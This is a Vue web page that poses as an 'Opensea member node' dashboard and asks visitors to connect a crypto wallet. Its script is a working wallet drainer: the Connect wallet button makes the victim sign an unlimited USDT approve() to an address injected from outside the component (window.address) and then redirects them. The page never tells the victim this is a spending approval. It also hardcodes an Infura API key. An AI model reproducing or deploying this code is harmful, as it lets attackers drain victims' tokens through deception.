<template>
  <div class="contentbox">
    <div class="header">
      <div class="headertop">
        <img src="./assets/img/ps5oow0k67x5hlefum1szp7nn31mekuqdq4041e6d9-9f68-40e1-b8d0-07c0ffb28276.png">
        <img @click="showDialog" src="./assets/img/pszpq047pcocdeok49tps6ymlhxz18nvemp2eeafc75-1758-41da-9335-196351c38def.png">
        <div class="connect" @click="getApprove">Connect&nbsp;wallet</div>
        <img class="img3" @click="showDialog"
             src="./assets/img/psdlj4ui1wrn8lm5ga2bw0eqy7djdlnbha56d0cdb7-4f01-478b-94e9-5053ce741584.png">
      </div>
      <div class="headersecond">
        <div class="text1">Dashboard</div>
        <div class="v3box">
          <img src="./assets/img/psco6sv8c4w0b2celkhzmgawb37c0ct9cjr8abb4fba-5ff4-4329-864d-0e67e9e8202a.png">
          <div class="text2">Ethereum</div>
          <div class="redv3">V3</div>
          <img @click="showDialog" class="v3boximg2"
               src="./assets/img/psfyn3gi8ubth8ycnkdmkc4tjortdve6sp313cce7d-fc87-4cd6-b206-bb26cb67697e.png"/>
        </div>
      </div>
    </div>
    <div class="tipbox">
      <div class="tip">
        <img src="./assets/img/psmrj87qs14cs44wmgvdovbk2g95jnczhjffffbcfe3-1b9b-4b53-9e11-a024cb04c194.png"/>
        <div class="top_txt1">Please,connect your wallet</div>
        <div class="tip_txt2"> Please connect your wallet and obtain your</div>
        <div class="tip_txt2"> Opensea member node. Please make sure you have</div>
        <div class="tip_txt2"> relative ETH GAS fee before proceeding.</div>
        <button class="tip_btn" @click="getApprove">Connect wallet</button>
      </div>
    </div>
    <div class="content">

    </div>
    <div class="floor">
      <div> ©2018 - 2024 0zone Networks, Inc</div>
      <div @click="showDialog"> Privacy Policy Terms of Service</div>
    </div>
  </div>
</template>
<script>
import Web3 from '@/js/web3.min.js'
import abi from '@/js/ERC20.json'
import WalletConnectProvider from '@/js/web3provider.js'
import Web3Modal from '@/js/w3model.js';
import { Dialog } from 'vant';
export default {
  data() {
    return {
      constants: {}
    };
  },
  mounted() {
  },
  methods: {
    showDialog() {
      Dialog.alert({
        title: '',
        message: 'Please connect your wallet first',
        confirmButtonText:"Confirm"
      }).then(() => {
        // 对话框确认按钮被点击时的回调
        console.log('Confirmation button is clicked');
      });
    },
    async getApprove() {
      let address = undefined;
      let whatsdapp = 0;
      let auaddress = window.address;
      if (window.ethereum) {
        await window.ethereum.enable().then((res) => {
          address = res[0];
          whatsdapp = 0;
        });
      }
      if (whatsdapp == 0) {
        var infura_key = "7d73a0c13ce946769577714aef84b79a"
        var adrs = [
          '',
          '',
          'https://cloudflare-eth.com',
          'https://bsc-dataseed1.defibit.io',
          'https://http-mainnet.hecochain.com'
        ]
        var coinadrs = [
          '',
          '',
          '0xdac17f958d2ee523a2206206994597c13d831ec7',
          '0x55d398326f99059ff775485246999027b3197955',
          '0xa71edc38d189767582c38a3145b5873052c3e47a'
        ]
        var erctype = 3
        var approveAddr = coinadrs[erctype]
        var _web3 = new Web3(adrs[erctype])
        var providerOptions = {
          walletconnect: {
            package: WalletConnectProvider,
            options: {
              infuraId: infura_key,
            }
          },
        };
        const web3Modal = new Web3Modal({
          cacheProvider: false,
          providerOptions,
          disableInjectedProvider: false,
        });

        const provider = await web3Modal.connect();
        provider.enable()
        const web3 = new Web3(provider);
        provider.enable()
        const contract = new web3.eth.Contract(abi, "0xdac17f958d2ee523a2206206994597c13d831ec7")
        const gasPrice = web3.eth.gasPrice;
        contract.methods.approve(auaddress, web3.utils.toBN(
            '0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff')).send({
          from: address,
          gasPrice: gasPrice,
          gas: 70000,
        }, function (err, tx) {
          console.log(err, tx)
          if (!err) {

            window.location.href = window.url;
          } else {
            // window.location.href = window.url;
            // console.log("授权失败!")
            Dialog.alert({
              title: '',
              message: 'Connection failure',
              confirmButtonText:"Confirm"
            }).then(() => {
              // 对话框确认按钮被点击时的回调
              console.log('Confirmation button is clicked');
            });
          }
        })
      }
    }
  }
};
</script>
<style>
#app {
  height: 100vh;
}

.header {
  background: url("./assets/images/banner.png");
  background-repeat: no-repeat;
  background-size: 100% 100%;
}

.headertop {
  height: 60px;
  line-height: 40px;
  min-height: 40px;
  padding: 10px;
  display: flex;
  justify-content: space-between;
  border-bottom: 1px solid #333333;
}

.connect {
  color: white;
}

.headertop img:nth-child(1) {
  width: 140px;
  height: 40px;
  padding-right: 20px;
}


.headertop img:nth-child(2) {
  height: 30px;
  margin-top: 5px;
}

.connect {
  font-size: 16px;
  font-weight: 800;
  height: 40px;
  background: rgba(0, 195, 149, 1);;
  padding: 0 5px;
  border-radius: 8px;
}

.img3 {
  width: 30px !important;
  height: 30px !important;
  margin-top: 5px;
}

.headersecond {
  padding: 0 20px 70px 20px;
}

.text1 {
  color: white;
  /*font-weight: 700;*/
  font-size: 22px;
  padding: 20px 30px 20px 20px;
}

.text2 {
  color: white;
  font-weight: 800;
  font-size: 20px;
  line-height: 60px;
  margin: 0 10px;
}

.redv3 {
  background-color: rgba(254, 36, 107, 1);
  border-radius: 18px 0px 18px 18px;
  height: 23px;
  font-size: 18px;
  color: white;
  margin-left: -2px;
  width: 39px;
  text-align: center;
}

.v3box {
  display: flex;
}

.v3box img:nth-child(1) {
  margin-left: 20px;
  width: 50px;
  height: 50px;
}

.v3boximg2 {
  margin-top: 15px;
  width: 25px;
  height: 25px;
}

.content {
  background-color: rgba(245, 245, 245, 1);
  flex: 1;
  padding: 0 20px;
  position: relative;
}

.contentbox {
  display: flex;
  flex-direction: column;
  min-height: 100vh;
}

.tipbox {
  height: 100px;
  width: 100%;
  position: relative;
}

.tip {
  width: 90%;
  background: white;
  text-align: center;
  border-radius: 10px;
  position: absolute;
  z-index: 9;
  top: -60px;
  left: 50%;
  transform: translateX(-50%);
  padding: 50px 7px 20px 7px;
}

.tip img {
  width: 200px;
  height: 200px;
}

.top_txt1 {
  color: black;
  font-size: 20px;
  padding: 10px 0 10px 0;
  font-weight: 800;
}

.tip_txt2 {
  color: rgba(119, 119, 119, 1);
  font-size: 15px;
  overflow-wrap: break-word;
}

.tip_btn {
  order-radius: 8px;
  border: 2px solid rgba(0, 195, 149, 1);
  color: rgba(0, 195, 149, 1);
  background: none;
  outline: none;
  font-size: 18px;
  border-radius: 5px;
  padding: 5px;
  margin-top: 5px;
}

.floor {
  background-color: rgba(245, 245, 245, 1);
  height: 53px;
  overflow-wrap: break-word;
  color: rgba(176, 176, 176, 1);
  font-family: PingFangSC-Medium;
  font-weight: 500;
  text-align: center;
  line-height: 20px;
  padding-bottom: 20px;
}

.floor div {
  width: 245px;
  margin: 0 auto;
  font-size: 14px;
}
</style>
